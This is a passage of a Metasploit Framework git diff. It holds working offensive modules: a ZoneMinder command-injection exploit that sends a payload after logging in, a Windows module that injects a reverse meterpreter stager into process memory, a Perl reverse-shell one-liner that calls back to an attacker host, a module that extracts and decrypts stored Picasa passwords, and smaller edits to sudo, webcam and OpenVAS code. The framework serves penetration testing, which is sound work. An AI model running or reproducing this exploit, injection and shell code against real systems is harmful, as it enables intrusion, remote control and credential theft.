user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if res and res.code == 200 + if res.body =~ /ZM - Login<\/title>/ + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.body =~ /v1.2(4\.\d+|5\.0)/ + return Exploit::CheckCode::Appears + elsif res.body =~ /<title>ZM/ + return Exploit::CheckCode::Detected + end + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def exploit + + @peer = "#{rhost}:#{rport}" + base = target_uri.path + base << '/' if base[-1, 1] != '/' + cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + data = "action=login&view=postlogin&username=#{user}&password=#{pass}" + command = Rex::Text.uri_encode(payload.encoded) + + # login + print_status("#{@peer} - Authenticating as user '#{user}'") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'cookie' => "#{cookie}", + 'data' => "#{data}", + }) + if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + print_good("#{@peer} - Authenticated successfully") + + # send payload + print_status("#{@peer} - Sending payload (#{command.length} bytes)") + begin + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}index.php", + 'data' => "view=none&action=state&runState=start;#{command}%26", + 'cookie' => "#{cookie}" + }) + if res and res.code == 200 + print_good("#{@peer} - Payload sent successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + end + +end + diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb new file mode 100644 index 0000000000..0e748cb607 --- /dev/null +++ b/modules/exploits/windows/local/payload_inject.rb @@ -0,0 +1,176 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/exploit/exe' + +class Metasploit3 < Msf::Exploit::Local + Rank = ExcellentRanking + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Memory Payload Injection', + 'Description' => %q{ + This module will inject a payload into memory of a process. If a payload + isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID + datastore option isn't specified, then it'll inject into notepad.exe instead. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Carlos Perez <carlos_perez[at]darkoperator.com>', + 'sinn3r' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Oct 12 2011" + )) + + register_options( + [ + OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), + OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false]) + ], self.class) + end + + # Run Method for when run command is issued + def exploit + @payload_name = datastore['PAYLOAD'] + @payload_arch = framework.payloads.create(@payload_name).arch + + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + pid = get_pid + if not pid + print_error("Unable to get a proper PID") + return + end + + if @payload_arch.first =~ /64/ and client.platform =~ /x86/ + print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") + print_error("Migrate to an x64 process and try again.") + return false + else + inject_into_pid(pid) + end + end + + # Figures out which PID to inject to + def get_pid + pid = datastore['PID'] + if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid) + print_status("Launching notepad.exe...") + pid = create_temp_proc + end + + return pid + end + + + # Determines if a PID actually exists + def has_pid?(pid) + procs = [] + begin + procs = client.sys.process.processes + rescue Rex::Post::Meterpreter::RequestError + print_error("Unable to enumerate processes") + return false + end + + pids = [] + + procs.each do |p| + found_pid = p['pid'] + return true if found_pid == pid + end + + print_error("PID #{pid.to_s} does not actually exist.") + + return false + end + + # Checks the Architeture of a Payload and PID are compatible + # Returns true if they are false if they are not + def arch_check(pid) + # get the pid arch + client.sys.process.processes.each do |p| + # Check Payload Arch + if pid == p["pid"] + vprint_status("Process found checking Architecture") + if @payload_arch.first == p['arch'] + vprint_good("Process is the same architecture as the payload") + return true + else + print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.") + return false + end + end + end + end + + # Creates a temp notepad.exe to inject payload in to given the payload + # Returns process PID + def create_temp_proc() + windir = client.fs.file.expand_path("%windir%") + # Select path of executable to run depending the architecture + if @payload_arch.first== "x86" and client.platform =~ /x86/ + cmd = "#{windir}\\System32\\notepad.exe" + elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/ + cmd = "#{windir}\\System32\\notepad.exe" + elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/ + cmd = "#{windir}\\Sysnative\\notepad.exe" + elsif @payload_arch.first == "x86" and client.platform =~ /x64/ + cmd = "#{windir}\\SysWOW64\\notepad.exe" + end + + begin + proc = client.sys.process.execute(cmd, nil, {'Hidden' => true }) + rescue Rex::Post::Meterpreter::RequestError + return nil + end + + return proc.pid + end + + def inject_into_pid(pid) + vprint_status("Performing Architecture Check") + return if not arch_check(pid) + + begin + print_status("Preparing '#{@payload_name}' for PID #{pid}") + raw = payload.generate + + print_status("Opening process #{pid.to_s}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + if not host_process + print_error("Unable to open #{pid.to_s}") + return + end + + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) + + # Ensure memory is set for execution + host_process.memory.protect(mem) + + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, raw) + host_process.thread.create(mem, 0) + print_good("Successfully injected payload in to process: #{pid}") + + rescue Rex::Post::Meterpreter::RequestError => e + print_error("Unable to inject payload:") + print_line(e.to_s) + end + end + +end \ No newline at end of file diff --git a/modules/payloads/singles/cmd/windows/reverse_perl.rb b/modules/payloads/singles/cmd/windows/reverse_perl.rb index 37bb01b97d..837e089ef6 100644 --- a/modules/payloads/singles/cmd/windows/reverse_perl.rb +++ b/modules/payloads/singles/cmd/windows/reverse_perl.rb @@ -48,7 +48,7 @@ module Metasploit3 lhost = datastore['LHOST'] ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\"#{lhost}:#{datastore['LPORT']}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'" + cmd = %{perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET#{ver}(PeerAddr,\\"#{lhost}:#{datastore['LPORT']}\\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"} end end diff --git a/modules/post/multi/manage/sudo.rb b/modules/post/multi/manage/sudo.rb index e2e1273030..41155587d1 100644 --- a/modules/post/multi/manage/sudo.rb +++ b/modules/post/multi/manage/sudo.rb @@ -30,7 +30,11 @@ class Metasploit3 < Msf::Post versions from 2008 and later which support -A. }, 'License' => MSF_LICENSE, - 'Author' => [ 'todb <todb[at]metasploit.com>'], + 'Author' => + [ + 'todb <todb[at]metasploit.com>', + 'Ryan Baxendale <rbaxendale[at]gmail.com>' #added password option + ], 'Platform' => [ 'linux','unix','osx','solaris','aix' ], 'References' => [ @@ -39,6 +43,11 @@ class Metasploit3 < Msf::Post ], 'SessionTypes' => [ 'shell' ] # Need to test 'meterpreter' )) + + register_options( + [ + OptString.new('PASSWORD', [false, 'The password to use when running sudo.']) + ], self.class) end # Run Method for when run command is issued @@ -57,7 +66,12 @@ class Metasploit3 < Msf::Post end def get_root - password = session.exploit_datastore['PASSWORD'] + if datastore['PASSWORD'] + password = datastore['PASSWORD'] + else + password = session.exploit_datastore['PASSWORD'] + end + if password.to_s.empty? print_status "No password available, trying a passwordless sudo." else diff --git a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb index ff188cd141..8977cbcc5e 100644 --- a/modules/post/windows/gather/credentials/enum_picasa_pwds.rb +++ b/modules/post/windows/gather/credentials/enum_picasa_pwds.rb @@ -19,18 +19,18 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Google Picasa Password Extractor', + 'Name' => 'Windows Gather Google Picasa Password Extractor', 'Description' => %q{ This module extracts and decrypts the login passwords stored by Google Picasa. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'SecurityXploded Team', #www.SecurityXploded.com 'Sil3ntDre4m <sil3ntdre4m[at]gmail.com>', ], - 'Platform' => [ 'win' ], + 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) end @@ -70,33 +70,12 @@ class Metasploit3 < Msf::Post end def get_registry - psecrets = "" begin print_status("Looking in registry for stored login passwords by Picasa ...") - username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", - 'GaiaEmail') - password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", - 'GaiaPass') - - if username != nil and password != nil - passbin = [password].pack("H*") - pass = decrypt_password(passbin) - - if pass != nil - print_status("Username: #{username}") - print_status("Password: #{pass}") - secret = "#{username}:#{pass}" - psecrets << secret - end - end - - #For early versions of Picasa3 - username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", - 'GaiaEmail') - password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", - 'GaiaPass') + username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaEmail') || '' + password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') || '' credentials = Rex::Ui::Text::Table.new( 'Header' => "Picasa Credentials", @@ -107,29 +86,55 @@ class Metasploit3 < Msf::Post "Password" ]) - if username != nil and password != nil + foundcreds = 0 + if !username.empty? and !password.empty? passbin = [password].pack("H*") pass = decrypt_password(passbin) - if pass != nil - print_status("Username: #{username}") - print_status("Password: #{pass}") + if pass and !pass.empty? + print_status("Found Picasa 2 credentials.") + print_good("Username: #{username}\t Password: #{pass}") + foundcreds = 1 credentials << [username,pass] - path = store_loot( - "picasa.creds", - "text/csv", - session, - credentials.to_csv, - "decrypted_picasa_data.csv", - "Decrypted Picasa Passwords") - - print_status("Decrypted passwords saved in: #{path}") end end + #For early versions of Picasa3 + username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaEmail') || '' + password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') || '' + + + if !username.empty? and !password.empty? + passbin = [password].pack("H*") + pass = decrypt_password(passbin) + + if pass and !pass.empty? + print_status("Found Picasa 3 credentials.") + print_good("Username: #{username}\t Password: #{pass}") + + foundcreds = 1 + credentials << [username,pass] + end + end + + if foundcreds == 1 + path = store_loot( + "picasa.creds", + "text/csv", + session, + credentials.to_csv, + "decrypted_picasa_data.csv", + "Decrypted Picasa Passwords" + ) + + print_status("Decrypted passwords saved in: #{path}") + else + print_status("No Picasa credentials found.") + end + rescue ::Exception => e - print_error("An error has occurred: #{e.to_s}") + print_error("An error has occurred: #{e.to_s}") end end diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb index 6b838d04aa..aab47587c3 100644 --- a/modules/post/windows/manage/webcam.rb +++ b/modules/post/windows/manage/webcam.rb @@ -16,8 +16,8 @@ class Metasploit3 < Msf::Post super(update_info(info, 'Name' => 'Windows Manage Webcam', 'Description' => %q{ - This module will allow you to these things with your target's webcam: detect, - take a snapshot. + This module will allow the user to detect installed webcams (with + the LIST action) or take a snapshot (with the SNAPSHOT) action. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -132,4 +132,5 @@ class Metasploit3 < Msf::Post return webcams end -end \ No newline at end of file +end + diff --git a/plugins/openvas.rb b/plugins/openvas.rb index 247a0b7a7d..34d8140552 100644 --- a/plugins/openvas.rb +++ b/plugins/openvas.rb @@ -530,7 +530,7 @@ class Plugin::OpenVAS < Msf::Plugin end else print_status("Usage: openvas_report_import <report_id> <format_id>") - print_status("Only the NBE format is supported for importing.") + print_status("Only the NBE and XML formats are supported for importing.") end end